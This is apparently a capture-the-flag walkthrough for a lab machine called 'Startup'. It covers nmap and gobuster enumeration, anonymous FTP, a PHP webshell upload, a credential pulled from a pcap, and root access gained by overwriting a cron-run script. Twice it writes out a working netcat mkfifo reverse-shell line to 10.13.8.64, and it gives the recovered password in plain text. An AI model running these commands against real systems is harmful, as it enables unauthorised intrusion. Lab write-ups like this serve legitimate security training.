Startup

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.50.218

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 21,22,80

  • (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.50.218

Enumeration

Port 21: FTP

From the nmap scan we can see that we are allowed to login as Anonymous, so lets login and see what we can find.

Username: anonymous

Password: anonymous

ftp 10.10.50.218

Lets list what files there are in the server

There is a directory and 3 files, lets get both the files and then see what is in the directory.

get <file-name>

Now lets cd into the ftp directory and check the files

cd ftp
ls -la

Looks like there is nothing in the directory. Now lets get back to our machine and read the files.

cat notice.txt

We now have a possible username which is Maya, so lets add that to our notes.

The image does not have interesting but it does have something that we should think about :)

There is nothing in .test.log

cat .test.log

Looks like that is all we get from FTP.

Port 80: HTTP

Lets visit the website

Lets look at the source code

Nothing of interest, lets use gobuster to find hidden directories

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.50.218/

We found a directory called /files, lets go visit it

Looks like the same files we found in the FTP server.

Exploitation

Looking at the ftp directory in the FTP server, we had permission to write in the directory, which means we could add a webshell to the directory and access it on the web page.

We can use this webshell for that. Once you copy it to your directory, lets login through ftp and cd into the ftp directory. Lets move the index.php (which I renamed as web.php) to the /Startup directory and then login.

Now time to put the file into the directory using the put command

put web.php

Now that we added the web.php to the directory, lets visit it on the website

Now we can run commands on the shell. Lets get a reverse shell , we can get the command from here.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

We also have to start a netcat listener

nc -lvnp 1234

Now we run the command

Once you do, you get a reverse shell.

Once in the box, use these commands to stabilize the shell

Looking through the directories, there was one directory that was unusual which is /incidents

It has a pcapng file , so lets try to get information from it, but first we need to copy it to the ftp directory so that we can download it from the website.

cp suspicious.pcapng /var/www/html/files/ftp/

Once we do this , we can download the file from the website

Once downloaded, you can open it with Wireshark using this command

wireshark suspicious.pcapng

After you use this command, Wireshark opens the packet.

Following a TCP stream we come across some interesting stuff, which is a password

Lets try to use this password c4ntg3t3n0ughsp1c3 to switch users to Lennie on the machine

su lennie

Looks like we are now Lennie. We can read the user.txt now

Also looking at the starting directory, we find another interesting file called /recipe.txt , lets read that.

cat recipe.txt

This is the answer to the first question of the room

Privilege Escalation

We see a file called planner.sh in the /scripts directory in Lennie's home directory. Lets read it.

cat planner.sh

It executes a file called /etc/print.sh, lets read that file

cat /etc/print.sh

It is a bash script that prints Done!. What if we echo a reverse shell and listen on our machine, would that give us root? Lets try it out.

We can use the reverse shell we did before and echo it into the file

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f" > /etc/print.sh

Also make sure you started a netcat listener and after a while, you get a reverse shell and as root

You can now read the root.txt flag

Last updated